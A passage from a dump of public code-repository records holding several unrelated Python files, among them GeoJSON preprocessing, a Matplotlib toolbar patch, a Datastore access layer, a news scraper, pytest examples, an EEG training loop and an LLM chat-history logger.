'test_geojson' not in data_dict[name]:\n continue\n geo_i = gpd.read_file(data_dict[name]['path'] + data_dict[name][data])\n geo_i['name'] = name\n geo_i.set_index('id', inplace=True)\n geo = pd.concat([geo, geo_i])\n result.append(geo)\n return result\n\ndef main():\n data_dir = 'data'\n data_dict = {'borde_rural':\n {'path': f'{data_dir}/stac/colombia/borde_rural/',\n 'imagery': 'borde_rural_ortho-cog.tif',\n 'train_geojson': 'train-borde_rural.geojson',\n 'test_geojson': 'test-borde_rural.geojson'},\n 'borde_soacha':\n {'path': f'{data_dir}/stac/colombia/borde_soacha/',\n 'imagery': 'borde_soacha_ortho-cog.tif',\n 'train_geojson': 'train-borde_soacha.geojson',\n 'test_geojson': 'test-borde_soacha.geojson'},\n 'mixco_1_and_ebenezer':\n {'path': f'{data_dir}/stac/guatemala/mixco_1_and_ebenezer/',\n 'imagery': 'mixco_1_and_ebenezer_ortho-cog.tif',\n 'train_geojson': 'train-mixco_1_and_ebenezer.geojson',\n 'test_geojson': 'test-mixco_1_and_ebenezer.geojson'},\n 'mixco_3':\n {'path': f'{data_dir}/stac/guatemala/mixco_3/',\n 'imagery': 'mixco_3_ortho-cog.tif',\n 'train_geojson': 'train-mixco_3.geojson',\n 'test_geojson': 'test-mixco_3.geojson'},\n 'castries':\n {'path': f'{data_dir}/stac/st_lucia/castries/',\n 'imagery': 'castries_ortho-cog.tif',\n 'train_geojson': 'train-castries.geojson'},\n 'dennery':\n {'path': f'{data_dir}/stac/st_lucia/dennery/',\n 'imagery': 'dennery_ortho-cog.tif',\n 'train_geojson': 'train-dennery.geojson',\n 'test_geojson': 'test-dennery.geojson'},\n 'gros_islet':\n {'path': f'{data_dir}/stac/st_lucia/gros_islet/',\n 'imagery': 'gros_islet_ortho-cog.tif',\n 'train_geojson': 'train-gros_islet.geojson'}\n }\n\n train_geojson, test_geojson = combine_geojsons(data_dict)\n print(f'Number of train samples - {len(train_geojson)}')\n print(f'Number of test samples - {len(test_geojson)}')\n\n train_geojson.reset_index(inplace=True)\n test_geojson.reset_index(inplace=True)\n train_geojson.to_file(f'{data_dir}/train.geojson', driver='GeoJSON')\n 
test_geojson.to_file(f'{data_dir}/test.geojson', driver='GeoJSON')\n\n\nif __name__==\"__main__\":\n main()","repo_name":"drivendataorg/open-ai-caribbean","sub_path":"1st Place/src/data/preprocess_input_data.py","file_name":"preprocess_input_data.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"fr","doc_type":"code","stars":23,"dataset":"github-code","pt":"51"} +{"seq_id":"16423788118","text":"from .common import *\nimport matplotlib.backends.backend_qt\nfrom matplotlib.backends.qt_compat import QtGui, _enum, _devicePixelRatioF, _setDevicePixelRatio\n\n\n_OldToolbarClass = matplotlib.backends.backend_qt.NavigationToolbar2QT\n\n\nclass _NavigationToolbar2Qt(_OldToolbarClass):\n def __init__(self, canvas, parent, coordinates=True):\n super().__init__(canvas, parent, coordinates=coordinates)\n for text, tooltip_text, image_file, callback in TOOLITEMS:\n a = self.addAction(self._fb_icon(image_file), text, callback(self))\n self._actions[callback] = a\n a.setCheckable(False)\n if tooltip_text is not None:\n a.setToolTip(tooltip_text)\n\n def _fb_icon(self, name):\n \"\"\"\n Construct a `.QIcon` from an image file *name*, including the extension\n and relative to Matplotlib's \"images\" data directory.\n \"\"\"\n pm = QtGui.QPixmap(name)\n _setDevicePixelRatio(pm, _devicePixelRatioF(self))\n if self.palette().color(self.backgroundRole()).value() < 128:\n icon_color = self.palette().color(self.foregroundRole())\n mask = pm.createMaskFromColor(QtGui.QColor('black'), _enum(\"QtCore.Qt.MaskMode\").MaskOutColor)\n pm.fill(icon_color)\n pm.setMask(mask)\n return QtGui.QIcon(pm)\n\n\nmatplotlib.backends.backend_qt.NavigationToolbar2QT = _NavigationToolbar2Qt\n","repo_name":"jmishra01/Custom-button-in-Matplotlib-toolbar","sub_path":"custom_tool_button/tool_qt.py","file_name":"tool_qt.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"72101512478","text":"#!/usr/bin/env python\n# coding=utf8\n\n# Add tags folder to modules path\nimport sys\nsys.path.append('./tags')\nfrom datetime import datetime\nimport tag_creator\n\nfrom google.cloud import datastore\nimport config\n\nds = datastore.Client(project=config.PROJECT_ID)\n\ndef retrievePouches(taglist):\n ''' Get the wordPouch for a tag from Datastore; if tag does not exist\n already, it is created\n\n Args:\n taglist (list): Indicates how to build Key for tags entity\n\n Returns:\n Array of wordPouch dicts for tags entities corresponding to single snippet\n Bin contains empty dict if tag could not be created\n '''\n\n snippetPouchArray=[]\n customPouchArray=[]\n for tagStr in taglist:\n # Iterating through each tag for the snippet\n tagSplit= tagStr.split('.')\n tag_key=''\n if len(tagSplit) == 1:\n #Tag contains only parent\n tag_key= datastore.Key(\"tags\", tagSplit[0], project=config.PROJECT_ID)\n elif len(tagSplit) == 2:\n #Tag contains parent.child\n tag_key= datastore.Key(\"tags\", tagSplit[0],\"tags\", tagSplit[1], project=config.PROJECT_ID)\n else:\n raise Exception('Incorrect argument for retrieval of tag entity')\n\n tag_dict= {}\n tag_ent = ds.get(key=tag_key)\n if tag_ent is None:\n #Create tag entity\n tag_ent= tag_creator.createCustomTag(tagStr)\n\n if tag_ent is not None:\n for i,word in enumerate(tag_ent['wordPouch']):\n tag_dict[word]= tag_ent['wordPouchScores'][i]\n\n if 'CUSTOM' in str(tag_ent.key):\n customPouchArray.append(tag_dict)\n else:\n snippetPouchArray.append(tag_dict)\n return 
(snippetPouchArray, customPouchArray)\n\ndef getArticleById(publisherId, articleId):\n    ''' Get article by id from Datastore\n\n    Args:\n        publisherId (int): Publisher ID\n        articleId (int): Article ID\n\n    Returns:\n        Article entity\n    '''\n    articleKey = datastore.Key('publishers', publisherId, 'articles', articleId, project=config.PROJECT_ID)\n    article = ds.get(key=articleKey)\n    return article\n\ndef getSnippetById(snippetId):\n    ''' Get a snippet by id from Datastore\n\n    Args:\n        snippetId (int): Snippet ID\n\n    Returns:\n        Snippet entity\n    '''\n    snippetKey = datastore.Key('snippets', snippetId, project=config.PROJECT_ID)\n    snippet = ds.get(key=snippetKey)\n    return snippet\n\ndef getUnprocessedSnippets():\n    ''' Get snippets whose wordPouch has not been populated yet\n\n    Args:\n        None\n\n    Returns:\n        List of unprocessed snippet entities\n    '''\n    query = ds.query(kind='snippets')\n    #query.add_filter('wordPouch', '=', 'empty') #Datastore sucks, filter doesn't work\n    snippets = list(query.fetch())\n    snippets = [snip for snip in snippets if len(snip['wordPouch']) == 1]\n    \n    return snippets\n\ndef getSnippets():\n    ''' Get all active snippets\n\n    Args:\n        None\n\n    Returns:\n        Snippets\n    '''\n    query = ds.query(kind='snippets')\n    query.add_filter('status', '=', 'active') # Doesn't work - WTYF?!!?\n    return list(query.fetch())\n\ndef saveEntity(entity):\n    ds.put(entity)\n\ndef articlesBeforeDate():\n    query = ds.query(kind='articles')\n    query_date = datetime.now().replace(hour=0, minute=0, second=0, microsecond=0)\n    query.add_filter('createDate', '>=', query_date)\n\n    articles = list(query.fetch())\n    \n    return articles\n\ndef articlesByPublisher(publisherId):\n    ancestor = ds.key('publishers', publisherId)\n    query = ds.query(kind='articles', ancestor=ancestor)\n    return list(query.fetch())\n\ndef getPublisherArticlesByStatus(publisherId, status):\n    query = ds.query(kind='articles')\n    query.add_filter('status', '=', status)\n    articles = list(query.fetch())\n    publisherArticles = [article for article in articles if article.key.parent.id_or_name == publisherId]\n    return publisherArticles\n\ndef updateStatus(entities, status):\n    for ent in entities:\n        ent['status'] = status\n        saveEntity(ent)\n\ndef getArticlesWithSnippet(snippetId):\n    query = ds.query(kind='articles')\n    query.add_filter('snippetId', '=', snippetId)\n    articles = list(query.fetch())\n    #publisherArticles = [article for article in articles if article.key.parent.id_or_name == publisherId]\n    return articles\n\ndef updateArticlesSnippetStatus(articles, status):\n    for article in articles:\n        currentStatus = article['snippetProperties']['status']\n        print('DAL - updateArticlesSnippetStatus: updating status [{}] => [{}] on snippet of article [{}]'.format(currentStatus, status, article.key.id_or_name))\n        article['snippetProperties']['status'] = status\n        saveEntity(article)\n\nif __name__ == '__main__':\n    #print(len(articlesBeforeDate()))\n    #print(len(getSnippets()))\n    \n    '''articles = getPublisherArticlesByStatus('gadgety.co.il', 'assigned')\n    print('TOTAL', len(articles))\n    for a in articles:\n        print(a.key.id_or_name, ' - ', a['snippetId'] if 'snippetId' in a else '?');'''\n    \n    #updateStatus(articles, 'inactive')\n\n    '''articles = getArticlesWithSnippet(5725107787923456)\n    print(len(articles))\n    updateArticlesSnippetStatus(articles, 'inactive')'''\n\n    articles = getArticlesWithSnippet(5769015641243648)\n    articles = [article for article in articles if article.key.parent.id_or_name == 'gadgety.co.il']\n    #print(len(articles))\n    updateArticlesSnippetStatus(articles, 'inactive')\n
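# Aside: retrievePouches() earlier in this file builds one- or two-level tag keys
# ('parent' vs 'parent.child'). A hedged sketch of that convention factored into a
# helper (illustrative name; same google-cloud-datastore Key API as used above):
def tag_key_for(tag_str, project):
    parts = tag_str.split('.')
    if len(parts) == 1:
        return datastore.Key('tags', parts[0], project=project)
    if len(parts) == 2:
        return datastore.Key('tags', parts[0], 'tags', parts[1], project=project)
    raise Exception('Incorrect argument for retrieval of tag entity')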
#lenPerArticle = {article.key.id_or_name: len(article[\"content\"].split(' ')) for article in articles}\n #lengths = [len(article[\"content\"].split(' ')) for article in articles]\n #print(lenPerArticle)\n\n \n ","repo_name":"arliber/simoti-backend","sub_path":"common/DAL.py","file_name":"DAL.py","file_ext":"py","file_size_in_byte":5419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"30897096399","text":"import json\nimport requests\nfrom bs4 import BeautifulSoup\n\n# news_list = []\n# for i in range(0,451,15):\n# src = f'https://www.skiddle.com/news/festivals/{i}'\n#\n# q = requests.get(src)\n# result = q.content\n# soup = BeautifulSoup(result, 'lxml')\n#\n# news = soup.find_all(class_='card-img-link')\n# for i in news:\n# news_page_url = \"https://www.skiddle.com\"+i.get('href')\n# news_list.append(news_page_url)\n# print(news_list)\n# with open('news_list.txt','a',encoding='utf-8') as file:\n# for line in news_list:\n# file.write(f'{line}\\n')\n\n\nwith open('news_list.txt') as file:\n lines = [line.strip() for line in file.readlines()]\n # пустой список для данных всех людей\n data_dict = []\n count = 0\n for line in lines:\n\n q = requests.get(line) # в i передается ссылка на новость\n result = q.content\n soup = BeautifulSoup(result,'lxml')\n new = soup.find(class_='grid').find('h1',class_='h2').text\n date = soup.find(class_='grid bg-white').find('p').text\n data = {\n 'title': new,\n 'date': date\n\n }\n count += 1\n print(f'#{count}: {line} is done!')\n data_dict.append(data)\n with open('data.json', 'w') as json_file:\n json.dump(data_dict, json_file, indent=4)","repo_name":"Colibri7/parsing","sub_path":"lesson5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"38786888003","text":"import random\nfrom dataclasses import dataclass\nfrom typing import Sequence\n\nimport pytest\nfrom django.test import TestCase\n\nfrom core.services import ExponentService\n\n\"\"\"\nDjango with Pytest Approaches\n\n- I have tried we can only utilize fixture benefit\n of pytest this way but only with driver class.\n\"\"\"\n\n\n\"\"\"\n# =================================================\n# Approach # 01 \n# =================================================\n\"\"\"\n\n\n@dataclass\nclass FixtureData:\n _input: Sequence[int]\n _expected_result: Sequence[int]\n\n\nclass ExponentServiceApproachOneTests(TestCase):\n def setUp(self) -> None:\n self.fd = {\n \"positive\": FixtureData((2, 2), [1, 4]),\n \"negative\": FixtureData((-2, -2), []),\n }\n return super().setUp()\n\n def test_get_exponents_with_positive_values(self):\n _input, _expected_result = self.fd[\"positive\"].__dict__.values()\n _actual_result = ExponentService.get_exponents(*_input)\n\n self.assertEqual(_actual_result, _expected_result)\n\n def test_get_exponents_with_negative_values(self):\n _input, _expected_result = self.fd[\"negative\"].__dict__.values()\n _actual_result = ExponentService.get_exponents(*_input)\n\n self.assertEqual(_actual_result, _expected_result)\n\n\n\"\"\"\n# =================================================\n# Approach # 02\n# =================================================\n\"\"\"\n\n\n@pytest.fixture(scope=\"session\")\ndef _input():\n return [(2, 2), (-1, -1)]\n\n\n@pytest.fixture(scope=\"session\")\ndef _expected_result():\n return [[1, 4], []]\n\n\n@pytest.fixture(scope=\"class\")\ndef 
exponent_service_fixtures(request, _input, _expected_result):\n request.cls._input = _input\n request.cls._expected_result = _expected_result\n\n\n@pytest.mark.usefixtures(\"exponent_service_fixtures\")\nclass ExponentServiceApproachTwoTests(TestCase):\n def test_get_exponents_with_positive_values(self):\n _input, _expected_result = self._input[0], self._expected_result[0]\n _actual_result = ExponentService.get_exponents(*_input)\n\n self.assertEqual(_actual_result, _expected_result)\n\n def test_get_exponents_with_negative_values(self):\n _input, _expected_result = self._input[1], self._expected_result[1]\n _actual_result = ExponentService.get_exponents(*_input)\n\n self.assertEqual(_actual_result, _expected_result)\n\n\n\"\"\"\n# =================================================\n\"\"\"\n\n\"\"\"\nPytest Approaches\n\n- if we use this approaches we can get all the features of pytest.\n- Moreover, Saleor is using the second approach.\n- But i think first approach will be more preferable for us\n because of our current code and it will take minimal change.\n\n\"\"\"\n\n\n\"\"\"\n# =================================================\n# Approach # 03\n# =================================================\n\"\"\"\n\n\nclass TestExponentService:\n \"\"\"\n Pytest finds both `test_` prefixed functions. There is no need to subclass anything,\n but make sure to prefix your class with Test otherwise the class will be skipped.\n \"\"\"\n\n @pytest.mark.parametrize(\n (\"_input\", \"_expected_initialization\"),\n [\n ((2, 2), [1, 2]),\n ((-1, -1), []),\n ((-1, 2), []),\n ((2, -1), [1, 2]),\n ],\n )\n def test_should_define_service(self, _input, _expected_initialization):\n instance = ExponentService(*_input)\n\n assert instance.resources == _expected_initialization\n\n def test_should_not_define_service(self):\n with pytest.raises(TypeError) as e:\n ExponentService()\n\n assert \"required positional argument\" in str(e.value)\n\n @pytest.mark.parametrize(\n (\"_input\", \"_expected_result\"),\n [\n ((2, 2), [1, 2]),\n ((-1, -1), []),\n ((-1, 2), []),\n ((2, -1), [1, 2]),\n ],\n )\n def test_get_exponents(self, mocker, _input, _expected_result):\n mocker.patch(\n \"core.services.ExponentService._store_exponents\", return_value=None\n )\n\n _actual_result = ExponentService.get_exponents(*_input)\n\n assert _actual_result == _expected_result\n\n @pytest.mark.parametrize(\n (\"_input\", \"_initial\", \"_expected_result\"),\n [\n ((2, 2), [1, 2], [4, 4]), # Positive values\n ((-1, -1), [], []), # Negative values\n ((-1, 2), [], []), # Negative number of values with positive exponent\n (\n (2, -1),\n [1, 2],\n [4, 4],\n ), # Positive number of values with negative exponent\n ],\n )\n def test_store_exponents(self, mocker, _input, _initial, _expected_result):\n mocker.patch(\n \"core.services.ExponentService._calculate_exponent\", return_value=4\n )\n instance = ExponentService(*_input)\n\n assert instance.resources == _initial\n instance._store_exponents()\n assert instance.resources == _expected_result\n\n @pytest.mark.parametrize(\n (\"_exponent_input\", \"_input\", \"_expected_result\"),\n [\n (0, 1, 1), # Zero exponent\n (2, 2, 4), # Positive exponent\n (-1, 2, 0.5), # Negative exponent\n (100, 2, 1_267_650_600_228_229_401_496_703_205_376), # Large exponent\n ],\n )\n def test_calculate_exponent(self, _exponent_input, _input, _expected_result):\n instance = ExponentService(n=random.randint(1, 100), exponent=_exponent_input)\n\n assert instance._calculate_exponent(_input) == _expected_result\n\n\n\"\"\"\n# 
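``core.services.ExponentService`` itself is not shown in this file. Purely as an assumption, a minimal implementation consistent with every test above and below might look like this; the real project code may differ:

    class ExponentService:
        def __init__(self, n, exponent):
            self.n = n
            self.exponent = exponent
            self.resources = list(range(1, n + 1))  # empty when n < 1

        def _calculate_exponent(self, value):
            return value ** self.exponent

        def _store_exponents(self):
            self.resources = [self._calculate_exponent(v) for v in self.resources]

        @classmethod
        def get_exponents(cls, n, exponent):
            service = cls(n, exponent)
            service._store_exponents()
            return service.resources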
=================================================\n# Approach # 04\n# =================================================\n\"\"\"\n\n\n@pytest.mark.parametrize(\n (\"_input\", \"_expected_result\"),\n [\n ((2, 2), [1, 2]),\n ((-1, -1), []),\n ((-1, 2), []),\n ((2, -1), [1, 2]),\n ],\n)\ndef test_get_exponents(mocker, _input, _expected_result):\n mocker.patch(\n \"core.services.ExponentService._store_exponents\",\n return_value=_expected_result,\n )\n _actual_result = ExponentService.get_exponents(*_input)\n\n assert _actual_result == _expected_result\n\n\n\"\"\"\n# =================================================\n\"\"\"\n","repo_name":"Sheikhharis50/pytest-example","sub_path":"src/core/tests/test_exponent_service.py","file_name":"test_exponent_service.py","file_ext":"py","file_size_in_byte":6211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"34129911497","text":"import os\r\nos.environ['PYTHONHASHSEED'] = '0'\r\n\r\nimport numpy as np\r\nnp.random.seed(1)\r\nfrom tensorflow import set_random_seed\r\nset_random_seed(2)\r\nimport random\r\nrandom.seed(9001)\r\n\r\nfrom Keras_3_Layers import Deep3Net, reduce_lr, early_stop\r\nfrom sklearn.metrics import roc_auc_score\r\n# # pair 1,2\r\n# from EEG_Processing import data_collectionC1S1, data_collectionC1S2, data_collectionC1S3, data_collectionC1S4, data_collectionC1S5, data_collectionC1S6\r\n# from EEG_Processing import validation_collectionC2S1, validation_collectionC2S2, validation_collectionC2S3, validation_collectionC2S4, validation_collectionC2S5, validation_collectionC2S6\r\n# from EEG_Processing import test_collectionC2S1, test_collectionC2S2, test_collectionC2S3, test_collectionC2S4, test_collectionC2S5, test_collectionC2S6\r\n\r\n# # pair 1,3\r\n# from EEG_Processing import data_collectionC1S1, data_collectionC1S2, data_collectionC1S3, data_collectionC1S4, data_collectionC1S5, data_collectionC1S6\r\n# from EEG_Processing import validation_collectionC3S1, validation_collectionC3S2, validation_collectionC3S3, validation_collectionC3S4, validation_collectionC3S5, validation_collectionC3S6\r\n# from EEG_Processing import test_collectionC3S1, test_collectionC3S2, test_collectionC3S3, test_collectionC3S4, test_collectionC3S5, test_collectionC3S6\r\n\r\n# pair 2,3\r\nfrom EEG_Processing import data_collectionC2S1, data_collectionC2S2, data_collectionC2S3, data_collectionC2S4, data_collectionC2S5, data_collectionC2S6\r\nfrom EEG_Processing import validation_collectionC3S1, validation_collectionC3S2, validation_collectionC3S3, validation_collectionC3S4, validation_collectionC3S5, validation_collectionC3S6\r\nfrom EEG_Processing import test_collectionC3S1, test_collectionC3S2, test_collectionC3S3, test_collectionC3S4, test_collectionC3S5, test_collectionC3S6\r\n\r\n\r\ndef data_handling(train, subject, val_test):\r\n train_data = eval('data_collectionC' + str(train) + 'S' + str(subject))['data']\r\n train_response = eval('data_collectionC' + str(train) + 'S' + str(subject))['response']\r\n val_data = eval('validation_collectionC' + str(val_test) + 'S' + str(subject))['data']\r\n val_response = eval('validation_collectionC' + str(val_test) + 'S' + str(subject))['response']\r\n\r\n test_data = eval('test_collectionC' + str(val_test) + 'S' + str(subject))['data']\r\n test_response = eval('test_collectionC' + str(val_test) + 'S' + str(subject))['response']\r\n class_weights = {0: len(train_response[train_response == 1])/len(train_response[train_response == 0]), 1: 1}\r\n\r\n 
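# Aside: the eval() lookups above work, but an explicit lookup helper is less
# fragile and easier to grep. A sketch using module globals (same assumption that
# the imported names follow the {kind}_collectionC{protocol}S{subject} pattern):
def get_collection(kind, protocol, subject):
    # kind is 'data', 'validation' or 'test'
    return globals()[f"{kind}_collectionC{protocol}S{subject}"]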
data_collection = dict(train_data=train_data, train_response=train_response, val_data=val_data,\r\n val_response=val_response, test_data=test_data, test_response=test_response,\r\n class_weights=class_weights)\r\n\r\n return data_collection\r\n\r\n\r\ndef model_fit_pred(model_net, train, subject, val_test):\r\n data_collection = data_handling(train, subject, val_test)\r\n model_net.fit(data_collection['train_data'], data_collection['train_response'],\r\n batch_size=128, epochs=100, verbose=1,\r\n callbacks=[reduce_lr, early_stop], shuffle=False,\r\n validation_data=(data_collection['val_data'], data_collection['val_response']),\r\n class_weight=data_collection['class_weights'])\r\n y_pred = model_net.predict(data_collection['test_data'], batch_size=128)\r\n y_pred_auc = roc_auc_score(data_collection['test_response'], y_pred)\r\n return y_pred_auc\r\n\r\n\r\ndef pair_wise_for_loop(train_protocol, test_protocol):\r\n list_subjects = ['1', '2', '3', '4', '5', '6']\r\n model_net = Deep3Net(num_classes=1, n_filters_2=70, n_filters_3=80)\r\n list_auc = []\r\n for i in list_subjects:\r\n y_pred_auc = model_fit_pred(model_net, train_protocol, i, test_protocol)\r\n list_auc.append(y_pred_auc)\r\n return list_auc\r\n\r\n\r\n# c1c2_result_five = []\r\n# for i in range(5):\r\n# c1c2_list = pair_wise_for_loop(1,2)\r\n# c1c2_result_five.append(c1c2_list)\r\n\r\n# c1c3_result_five = []\r\n# for i in range(5):\r\n# c1c3_list = pair_wise_for_loop(1,3)\r\n# c1c3_result_five.append(c1c3_list)\r\n\r\nc2c3_result_five = []\r\nfor i in range(5):\r\n c2c3_list = pair_wise_for_loop(2,3)\r\n c2c3_result_five.append(c2c3_list)\r\n\r\n","repo_name":"estellad/Conv-EEG-Decoding","sub_path":"Pair_Transfer_Loop.py","file_name":"Pair_Transfer_Loop.py","file_ext":"py","file_size_in_byte":4289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"72861379359","text":"from datetime import datetime\nfrom ..file_format import dump_csv\nfrom ..file_format import load_csv\nimport re\nfrom src.checksum import get_md5\nfrom src.select_content.test_set import select_test_set\n\n\nclass ChatHistory:\n\n def __init__(self, file_path, chat_context, save_format='csv'):\n self.folder = file_path.parent.parent / 'chat_history'\n self.folder.mkdir(exist_ok=True)\n\n self.save_format = save_format\n\n self.model = chat_context['model']\n self.chat_mode = chat_context['chat_mode']\n\n self.chatlog = self.load_file()\n\n # Remove item without question id\n self.chatlog = [\n i\n for i in self.chatlog\n # if i.get('question_id') and i['answer'] != 'NA from AI'\n ]\n\n today = datetime.today()\n self.date = today.strftime(\"%Y%m%d\")\n\n def check_result_exist(self):\n for i in self.folder.iterdir():\n if 'csv' in i.suffix.lower():\n return True\n\n return False\n\n @property\n def save_file_name(self):\n return 'chat_history'\n\n @property\n def save_path(self):\n return self.folder / f\"{self.save_file_name}.{self.save_format}\"\n\n @property\n def chat_history(self):\n chat_history = []\n for i in self.chatlog:\n log = (\n f'Question: {i[\"question\"]}\\n\\n'\n f'Answer: {i[\"answer\"]}\\n\\n'\n f'Explain: {i[\"explain\"]}\\n\\n'\n f'Sentences: {i[\"sentences\"]}\\n\\n'\n f'Confidence: {i[\"confidence\"]}\\n\\n'\n )\n chat_history.append(log)\n return '\\n\\n'.join(chat_history)\n\n def log(self, resp, questions={}):\n answer = resp['answer']\n del resp['answer']\n\n answers = parse_answers(answer)\n\n # one question\n if 'question' in resp:\n [\n i.update({\n 'question': 
resp['question'],\n 'question_id': resp['question_id'],\n })\n for i in answers\n ]\n del resp['question']\n\n answers = [\n a\n for a in answers\n if all(\n k in a\n for k in [\n 'question',\n 'answer',\n 'explain',\n 'sentences',\n 'confidence']\n )\n ]\n\n if not answers:\n answers = [\n {\n 'question_id': qid,\n 'question': q,\n 'answer': 'NA from AI',\n 'explain': 'NA from AI',\n 'sentences': 'NA from AI',\n 'confidence': 'NA from AI',\n }\n for qid, q in questions.items()\n ]\n\n if questions:\n answers = map_answer_to_question(answers, questions)\n\n answers = [\n i\n for i in answers\n if i.get('question_id')\n ]\n\n # remove duplicated answer\n answers = {\n (i['question_id'], i['answer']): i\n for i in answers\n }\n\n answers = list(answers.values())\n\n performance = resp\n\n for a in answers:\n a.update(performance)\n a['model'] = self.model\n a['chat_mode'] = self.chat_mode\n a['date'] = self.date\n self.chatlog.append(a)\n\n self.dump_file()\n\n return answers\n\n def check_answer_exist(self, qid, question, content, run_number):\n # TODO, also check all parts being processed\n for i in self.chatlog:\n if self.find_answered_question(qid, question, content, run_number):\n return True\n return False\n\n def find_answered_question(\n self,\n qid,\n question,\n content,\n run_number,\n check_content=False,\n model_date=False):\n # TODO, for embedding method, the query of question always do once.\n result = []\n for i in self.chatlog:\n if int(i['run_number']) != run_number:\n continue\n\n if str(qid) != str(i['question_id']):\n continue\n\n # if question != i['question']:\n # continue\n\n if not model_date:\n m1 = i['model'].split('-')[:2]\n m1 = '-'.join(m1)\n m2 = self.model.split('-')[:2]\n m2 = '-'.join(m2)\n if m1 != m2:\n continue\n else:\n if self.model != i['model']:\n continue\n\n if self.chat_mode != i['chat_mode']:\n continue\n\n # if check_content and (get_md5(content) != i.get('md5')):\n # continue\n\n # if i['answer'] == 'NA from AI':\n # continue\n\n result.append(i)\n\n return result\n\n def load_file(self):\n if not self.save_path.exists():\n return []\n return load_csv(self.save_path)\n\n def dump_log(self):\n self.dump_file()\n\n def dump_file(self):\n # TODO, header order\n self.save_format = 'csv'\n dump_csv(self.save_path, self.chatlog, headers=[\n 'question_id',\n 'question',\n 'answer',\n 'explain',\n 'sentences',\n 'confidence',\n 'completion_tokens',\n 'prompt_tokens',\n 'total_tokens',\n 'seconds',\n 'model',\n 'chat_mode',\n 'date',\n ])\n\n\ndef parse_answers(answers):\n # TODO: some case the answer format is not always right, give warning.\n answer_list = []\n this_answer = []\n for i in answers.split('\\n'):\n if i.startswith('Question') and this_answer:\n answer_list.append('\\n'.join(this_answer))\n this_answer = [i]\n else:\n this_answer.append(i)\n\n if this_answer:\n answer_list.append('\\n'.join(this_answer))\n\n return [\n parse_one_answer(i)\n for i in answer_list\n ]\n\n\ndef parse_one_answer(answer):\n answer = answer.split('\\n')\n answer = [i for i in answer if i]\n result = {}\n keys = [\n 'Question:',\n 'Answer:',\n 'Explain:',\n 'Sentences:',\n 'Confidence:',\n ]\n for i in answer:\n for k in keys:\n if i.startswith(k):\n t = k[:-1].lower()\n result[t] = i.replace(k, '').strip()\n\n if 'question' in result:\n q = result['question']\n match = re.match(r'^(?P\\d+)\\.(?P.*)', q)\n if match:\n result['question_id'] = int(match.groupdict()['id'])\n result['question'] = match.groupdict()['question'].strip()\n\n return result\n\n\ndef 
map_answer_to_question(answers, questions):\n # TODO, check answer\n for i in answers:\n if i.get('question_id'):\n continue\n\n if not i.get('question'):\n continue\n\n q = i['question']\n for k, v in questions.items():\n if q in v:\n i['question_id'] = k\n\n return answers\n\n\ndef fix_chat_history_question():\n\n test_set = select_test_set() / 'Papers'\n\n for i in test_set.iterdir():\n if not i.is_dir():\n continue\n\n history_folder = i / 'chat_history'\n if not history_folder.exists():\n # TODO give warning\n continue\n\n chat_history_file = history_folder / 'chat_history.csv'\n\n human_ans = {\n str(i['id']): i['question']\n for i in load_csv(i / 'human_answer.csv')\n }\n\n table = load_csv(chat_history_file)\n for i in table:\n if i['question'] != human_ans[i['question_id']]:\n # print(i['question_id'])\n # TODO dry run\n i['question'] = human_ans[i['question_id']]\n\n dump_csv(chat_history_file, table)\n\n\ndef fix_chat_history_run_number(run_number=1):\n\n test_set = select_test_set() / 'Papers'\n\n for i in test_set.iterdir():\n if not i.is_dir():\n continue\n\n history_folder = i / 'chat_history'\n if not history_folder.exists():\n # TODO give warning\n continue\n\n chat_history_file = history_folder / 'chat_history.csv'\n\n table = load_csv(chat_history_file)\n for i in table:\n if i.get('run_number', '') != '':\n continue\n i['run_number'] = run_number\n\n dump_csv(chat_history_file, table)\n\n\ndef remove_chat_history_run_number(run_number=100):\n\n # Protected runs\n if run_number <= 20:\n return\n\n test_set = select_test_set() / 'Papers'\n\n for i in test_set.iterdir():\n if not i.is_dir():\n continue\n\n history_folder = i / 'chat_history'\n if not history_folder.exists():\n # TODO give warning\n continue\n\n chat_history_file = history_folder / 'chat_history.csv'\n\n table = load_csv(chat_history_file)\n table = [\n i\n for i in table\n if int(i.get('run_number', '')) != run_number\n ]\n\n dump_csv(chat_history_file, table)\n\n\ndef remove_chat_history_run_number_and_qid(run_number=101, question_id=[\n 2102,]):\n\n test_set = select_test_set() / 'Papers'\n\n for i in test_set.iterdir():\n if not i.is_dir():\n continue\n\n history_folder = i / 'chat_history'\n if not history_folder.exists():\n # TODO give warning\n continue\n\n chat_history_file = history_folder / 'chat_history.csv'\n\n table = load_csv(chat_history_file)\n table = [\n i\n for i in table\n if not (\n int(i.get('run_number', 1)) == run_number and\n int(i['question_id']) in question_id\n )\n ]\n dump_csv(chat_history_file, table)\n","repo_name":"hivdb/chatpaper","sub_path":"src/chat/chat_history.py","file_name":"chat_history.py","file_ext":"py","file_size_in_byte":10008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"9495811480","text":"# encoding:utf-8\nfrom zipfile import ZipFile\ntry:\n from urllib.request import urlopen, Request\nexcept ImportError:\n from urllib2 import urlopen, Request\nfrom io import BytesIO\nfrom bs4 import BeautifulSoup\nimport os,sys\n\nurl=sys.argv[1]\n\ndef _read_docx(url):\n \"\"\"\n only can be used in python2.7,\n and can be decode error in python 3.x\n \"\"\"\n if 'http://' in url:\n wordFile = urlopen(url).read()\n else:\n files=open(url,'r')\n wordFile=files.read()\n files.close()\n \n wordFile = BytesIO(wordFile)\n document = ZipFile(wordFile)\n xml_content = document.read('word/document.xml')\n\n try:\n wordObj = BeautifulSoup(xml_content.decode('utf-8'))\n except:\n wordObj = 
